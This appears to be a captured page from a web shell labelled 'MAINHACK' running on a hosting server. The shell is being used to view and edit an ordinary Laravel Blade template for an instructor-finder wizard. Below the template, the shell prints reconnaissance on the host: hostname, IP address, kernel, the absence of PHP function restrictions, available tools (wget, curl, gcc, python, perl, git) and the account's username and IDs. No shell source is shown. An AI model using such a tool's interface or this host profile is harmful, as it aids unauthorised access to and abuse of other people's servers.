[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: wizard.blade.php
@extends('web.default.layouts.app',['appFooter' => false]) @section('content') <div class="instructor-finder-wizard row"> <div class="col-12 col-lg-4 wizard-left-side d-none d-md-block" style="background-image: url('{{ getPageBackgroundSettings('instructor_finder_wizard') }}')"> <div class="wizard-left-side-content position-relative w-100 h-100 d-flex align-items-end justify-content-center"> <div class=""> <h1 class="font-36 font-weight-bold text-white">{{ trans('update.looking_for_an_instructor') }}</h1> <p class="text-white font-16">{{ trans('update.looking_for_an_instructor_hint') }}</p> <div class="mt-30 d-flex align-items-center justify-content-between"> <div class="d-flex flex-column align-items-center"> <span class="wizard-stat-icon d-flex align-items-center justify-content-center rounded-circle text-white"> <i data-feather="user" width="30" height="30" class="text-white"></i> </span> <span class="font-30 font-weight-bold text-white mt-10">{{ $instructorsCount }}</span> <span class="font-14 text-white">{{ trans('home.instructors') }}</span> </div> <div class="d-flex flex-column align-items-center"> <span class="wizard-stat-icon d-flex align-items-center justify-content-center rounded-circle text-white"> <i data-feather="briefcase" width="30" height="30" class="text-white"></i> </span> <span class="font-30 font-weight-bold text-white mt-10">{{ $organizationsCount }}</span> <span class="font-14 text-white">{{ trans('home.organizations') }}</span> </div> <div class="d-flex flex-column align-items-center"> <span class="wizard-stat-icon d-flex align-items-center justify-content-center rounded-circle text-white"> <i data-feather="map-pin" width="30" height="30" class="text-white"></i> </span> <span class="font-30 font-weight-bold text-white mt-10">{{ $citiesCount }}</span> <span class="font-14 text-white">{{ trans('update.cities') }}</span> </div> </div> </div> </div> </div> <div class="col-12 col-lg-8 bg-white"> <div class="row wizard-content d-flex align-items-lg-center justify-content-lg-center"> <div class="col-12 col-lg-5"> @php $prevStep = $step - 1; @endphp <form action="/instructor-finder/wizard?{{ http_build_query(request()->all()) }}" method="get"> @if(!empty(request()->all()) and count(request()->all())) @foreach(request()->all() as $param => $value) @if($param !== 'step') <input type="hidden" name="{{ $param }}" value="{{ $value }}"> @endif @endforeach @endif <input type="hidden" name="step" value="{{ $step + 1 }}"> @include('web.default.instructorFinder.wizard.step_'.$step) @php $prevUrl = "/instructor-finder/wizard"; if ($step == 2) { $prevUrl .= "?step={$prevStep}"; } elseif ($step == 3) { $prevUrl .= "?step={$prevStep}&category_id=". request()->get('category_id'); }elseif ($step == 4) { $prevUrl .= "?step={$prevStep}&category_id=" . request()->get('category_id') . '&level_of_training=' . request()->get('level_of_training'); } @endphp <div class="mt-50 pt-20 border-top border-gray300 d-flex align-items-center justify-content-end"> <a href="{{ $prevUrl }}" class="js-prev-btn btn btn-gray300 btn-sm text-gray {{ ($step == 1) ? 'disabled' : '' }}">{{ trans('update.prev') }}</a> <button type="submit" class="btn btn-primary btn-sm ml-10">{{ trans('webinars.next') }}</button> </div> </form> </div> </div> </div> </div> @endsection @push('scripts_bottom') <script> var selectProvinceLang = '{{ trans('update.select_province') }}'; var selectCityLang = '{{ trans('update.select_city') }}'; var selectDistrictLang = '{{ trans('update.select_district') }}'; </script> <script src="/assets/default/js/parts/get-regions.min.js"></script> <script src="/assets/default/js/parts/instructor-finder-wizard.min.js"></script> @endpush
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285